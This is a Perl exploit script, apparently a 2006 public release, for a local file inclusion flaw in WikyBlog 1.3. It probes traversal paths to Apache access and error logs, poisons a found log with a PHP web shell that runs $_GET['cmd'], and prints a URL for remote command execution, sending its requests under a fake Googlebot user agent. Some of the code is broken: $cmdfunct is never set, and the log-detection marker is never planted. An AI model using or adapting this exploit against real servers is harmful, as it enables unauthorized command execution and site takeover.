WikyBlog Local File Inclusion Exploit

################################################################################################# # r0ut3r Presents... # # # # Another r0ut3r discovery! # # writ3r [at] gmail.com # # # # WikyBlog Local File Inclusion Exploit # ################################################################################################# # Software: WikyBlog 1.3 # # # # Vendor: http://www.wikyblog.com/ # # # # Released: 2006/12/01 # # # # Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) # # # # Note: The information provided in this document is for WikyBlog administrator # # testing purposes only! # # # # This exploit makes use of a local file inclusion exploit in # # WikyBlog to allow command execution. Firstly it locates an # # access_log, or error_log then it inserts a PHP Shell into # # the log file and returns a link for command execution. # # # # include/WBmap.php?l=file_to_include%00 # # register_globals being on does not affect this vulnerability # ################################################################################################# use IO::Socket; use Switch; $port = "80"; # connection port $target = @ARGV[0]; # localhost $folder = @ARGV[1]; # /wikyblog/ sub Header() { print q {################################################################################################# # r0ut3r Presents... # # # # Another r0ut3r discovery! # # writ3r [at] gmail.com # # # # WikyBlog Local File Inclusion Exploit # ################################################################################################# }; } sub Usage() { print q {Usage: wikyblogxpl1.3.pl [target] [folder] Example: wikyblogxpl1.3.pl localhost /wikyblog/ }; exit(); } Header(); if (!$target || !$folder) { Usage(); } # log list taken from Kacper's http://www.milw0rm.com/exploits/2253 @paths=( "../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../../../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log" ); print "[+] Attempting to locate log file\n"; $log = ""; foreach $path (@paths) { $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n"; print $sock "GET ".$folder."include/WBmap.php?l=".$path."%00 HTTP/1.1\n"; print $sock "Host: $target\n"; print $sock "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n"; print $sock "Accept: text/html\n"; print $sock "Connection: close\n\n\r\n"; #locate log file part taken from Kacper's http://www.milw0rm.com/exploits/2253 $out = ""; while ($answer = <$sock>) { $out.=$answer; } close($sock); if ($out =~ m/_exppl_(.*?)_exppl_/ms) { print "[+] Log file found! [".$path."] \n"; $log = $path; } } if ($log eq "") { print "[-] Log file not found. Exiting...\n"; exit(); } print "[+] Inserting PHP Shell into logs\n"; $code = "<?php ob_clean(); echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>"; $xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n"; print $xpl "GET /".$code." HTTP/1.1\n"; print $xpl "Host: $target\n"; print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n"; print $xpl "Accept: text/html\n"; print $xpl "Connection: close\n\n\r\n"; print "[+] Sent code...\n"; print "[!] Command execution at: ".$target.$folder."include/WBmap.php?l=".$log."%00";